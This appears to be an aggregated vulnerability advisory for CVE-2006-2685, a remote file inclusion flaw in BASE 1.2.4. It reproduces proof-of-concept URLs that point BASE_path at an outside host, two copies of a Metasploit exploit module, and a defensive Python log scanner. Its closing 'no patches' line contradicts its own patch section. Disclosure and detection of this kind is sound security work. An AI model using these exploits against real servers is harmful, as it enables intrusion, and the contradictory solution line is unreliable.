CVE-2006-2685
CVSS: 4.0
Published: 2006-05-31 06:06:00
Revised: 2011-08-23 00:00:00

[Original] PHP remote file inclusion vulnerability in Basic Analysis and Security Engine (BASE) 1.2.4 and earlier, with register_globals enabled, allows remote attackers to execute arbitrary PHP code via a URL in the BASE_path parameter to (1) base_qry_common.php, (2) base_stat_common.php, and (3) includes/base_include.inc.php.


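[CNNVD] Basic Analysis/Security Engine multiple remote file inclusion vulnerabilities (CNNVD-200605-548)

        Basic Analysis and Security Engine (BASE) 1.2.4 and earlier contains PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL in the BASE_path parameter to (1) base_qry_common.php, (2) base_stat_common.php, and (3) includes/base_include.inc.php.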

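- CVSS (base score)

CVSS score: 4 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-94 [Improper Control of Generation of Code (Code Injection)]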

- CPE (affected platforms and products)

cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.0
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.4
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.2
cpe:/a:kevin_johnson:basic_analysis_and_security_engine:1.2.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2685
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2685
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-548
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/18298
(PATCH)  BID  18298
http://xforce.iss.net/xforce/xfdb/26652
(UNKNOWN)  XF  base-path-file-include(26652)
http://www.vupen.com/english/advisories/2006/1996
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1996
http://www.osvdb.org/25770
(UNKNOWN)  OSVDB  25770
http://sourceforge.net/forum/forum.php?forum_id=577228
(UNKNOWN)  CONFIRM  http://sourceforge.net/forum/forum.php?forum_id=577228
http://secunia.com/advisories/20300
(VENDOR_ADVISORY)  SECUNIA  20300
http://milw0rm.com/exploits/1823
(UNKNOWN)  MILW0RM  1823
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576
(UNKNOWN)  CONFIRM  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=370576

- Vulnerability information

Basic Analysis/Security Engine multiple remote file inclusion vulnerabilities
Medium severity, code injection
2006-05-31 00:00:00 2006-06-12 00:00:00
Remote

- Advisories and patches

        The vendor has released an upgrade that fixes this security issue. Patch download links:
        BASE Basic Analysis and Security Engine 1.2
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.1
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.2
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download
        BASE Basic Analysis and Security Engine 1.2.4
        BASE base-1.2.5.tar.gz
        http://prdownloads.sourceforge.net/secureideas/base-1.2.5.tar.gz?download

- Vulnerability information (1823)

BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities (EDBID:1823)
php webapps
2006-05-25 Verified
0 str0ke
# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");
[/code]

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
   include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
   include_once("$BASE_path/includes/base_db.inc.php");
   include_once("$BASE_path/includes/base_output_html.inc.php");
   include_once("$BASE_path/includes/base_state_common.inc.php");
   ...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# milw0rm.com [2006-05-25]
		

- Vulnerability information (16897)

BASE base_qry_common Remote File Include (EDBID:16897)
php webapps
2010-11-24 Verified
0 metasploit
##
# $Id: base_qry_common.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BASE base_qry_common Remote File Include',
			'Description'    => %q{
					This module exploits a remote file inclusion vulnerability in
				the base_qry_common.php file in BASE 1.2.4 and earlier.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11127 $',
			'References'     =>
				[
					[ 'CVE', '2006-2685' ],
					[ 'OSVDB', '49366'],
					[ 'BID', '18298' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jun 14 2008',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
			], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end

end
		

- Vulnerability information (F82354)

BASE base_qry_common Remote File Include (PacketStormID:F82354)
2009-10-30 00:00:00
MC  
exploit,remote,php,file inclusion
CVE-2006-2685

This Metasploit module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'BASE base_qry_common Remote File Include.',
			'Description'    => %q{
					This module exploits a remote file inclusion vulnerability in
					the base_qry_common.php file in BASE 1.2.4 and earlier.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2006-2685' ],
					[ 'BID', '18298' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      => 
						{
							'ConnectionType' => 'find',
						},
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jun 14 2008',
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
				], self.class)
	end

	def php_exploit

		timeout = 0.01
		uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
		print_status("Trying uri #{uri}")

		response = send_request_raw( {
				'global' => true,
				'uri' => uri,
			},timeout)

		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end
		
		handler
	end

end

    

- Vulnerability information

25770
Basic Analysis and Security Engine (BASE) includes/base_include.inc.php BASE_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Basic Analysis and Security Engine (BASE) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "includes/base_include.inc.php" not properly sanitizing user input supplied to the "BASE_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
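
A defender's check for the pattern described above, as an added example that is not part of the original record: it scans web-server access-log lines for requests that pass BASE_path to the three affected scripts. The combined log format, the sample lines and the names `classify` and `scan` are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The three entry points named in the CVE-2006-2685 description.
AFFECTED_SCRIPTS = (
    "/base_qry_common.php",
    "/base_stat_common.php",
    "/includes/base_include.inc.php",
)
# Request line of a combined-log-format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme is the remote-inclusion pattern.
REMOTE_SCHEME_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jun/2006:10:00:01 +0000] "GET /base/base_main.php HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jun/2006:10:00:05 +0000] "GET /base/base_qry_common.php?BASE_path=http%3A%2F%2Ffiles.example.org%2Fx.txt%3F HTTP/1.0" 200 0
198.51.100.7 - - [01/Jun/2006:10:00:06 +0000] "GET /base/includes/base_include.inc.php?BASE_path=test HTTP/1.0" 200 0
192.0.2.10 - - [01/Jun/2006:10:00:09 +0000] "GET /base/base_stat_common.php HTTP/1.1" 200 812
"""


def classify(log_line):
    """Return None, 'param-override' or 'remote-url' for one log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    try:
        target = urlsplit(match.group(1))
    except ValueError:
        return None  # malformed request target, nothing to inspect
    if not unquote(target.path).lower().endswith(AFFECTED_SCRIPTS):
        return None
    # parse_qsl percent-decodes once, which is the value PHP would see.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == "BASE_path":
            # The scripts use $BASE_path as an include prefix, so a
            # client-supplied value is suspicious; a URL is the RFI case.
            return "remote-url" if REMOTE_SCHEME_RE.match(value) else "param-override"
    return None


def scan(log_text):
    """Return (line_number, client, verdict) for every flagged line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, line.split(" ", 1)[0], verdict))
    return hits
```

The check is meant for triaging historical logs of installations that ran BASE 1.2.4 or earlier; the fix listed on this page is the upgrade to base-1.2.5.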

- Timeline

2006-05-25 Unknown
2006-05-25 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
